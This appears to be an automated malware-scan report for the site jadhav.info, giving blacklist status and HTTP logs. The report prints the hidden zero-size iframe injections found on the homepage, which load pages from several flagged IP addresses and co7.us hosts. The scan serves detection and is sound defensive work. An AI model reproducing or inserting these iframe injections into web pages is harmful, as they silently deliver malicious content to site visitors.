Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jadhav.info
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://jadhav.info/ | 200 OK Content-Length: 5570 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 217.12.214.98 ...[1217 bytes skipped]... tion() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </HEAD> <BODY background="smoothy_blue.jpg"><iframe src="http://217.12.214.98/0e29?default_keyword=6&referrer=6.com&source=6.com" width="0" height="0" align="none"></iframe><iframe src="http://217.12.207.44/c82f?default_keyword=fuckword&referrer=pumba&source=google.ru" width="0" height="0" align="none"><iframe src="http://217.12.207.44/c82f" width="0" height="0" align="none"><iframe src="http://enco.co7.us/860d62c0vjdgqa.html" width="0" height="0" align="none"><iframe src="http://call.co7.us/d937fab5x7s.html" wid ...[2355 bytes skipped]... Hidden iFrame found. size: 0x0 src: http://82.118.17.38/?2 <iframe src="http://82.118.17.38/?2" width="0" height="0" align="none"> Hidden iFrame found. size: 0x0 src: http://enco.co7.us/860d62c0vjdgqa.html <iframe src="http://enco.co7.us/860d62c0vjdgqa.html" width="0" height="0" align="none"> Malicious iFrame found. size: 0x0 src: http://217.12.214.98/0e29?default_keyword=6&referrer=6.com&source=6.com This URL is marked by Google as suspicious <iframe src="http://217.12.214.98/0e29?default_keyword=6&referrer=6.com&source=6.com" width="0" height="0" align="none"> Hidden iFrame found. size: 0x0 src: http://call.co7.us/d937fab5x7s.html <iframe src="http://call.co7.us/d937fab5x7s.html" width="0" height="0" align="none"> Malicious iFrame found. size: 0x0 src: http://217.12.207.44/c82f This URL is marked by Google as suspicious <iframe src="http://217.12.207.44/c82f" width="0" height="0" align="none"> Malicious iFrame found. size: 0x0 src: http://217.12.207.44/c82f?default_keyword=fuckword&referrer=pumba&source=google.ru This URL is marked by Google as suspicious <iframe src="http://217.12.207.44/c82f?default_keyword=fuckword&referrer=pumba&source=google.ru" width="0" height="0" align="none"> | ||
http://jadhav.info/test404page.js | 500 Internal Server Error Content-Length: 748 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jadhav.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 27 Jan 2015 09:14:40 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 5570
Content-Type: text/html
Last-Modified: Thu, 06 Nov 2014 13:49:42 GMT
...5570 bytes of data.
GET / HTTP/1.1
Host: jadhav.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 27 Jan 2015 09:14:40 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 5570
Content-Type: text/html
Last-Modified: Thu, 06 Nov 2014 13:49:42 GMT
...5570 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: jadhav.info
Referer: http://www.google.com/search?q=jadhav.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: jadhav.info
Referer: http://www.google.com/search?q=jadhav.info
Result:
The result is similar to the first query. There are no suspicious redirects found.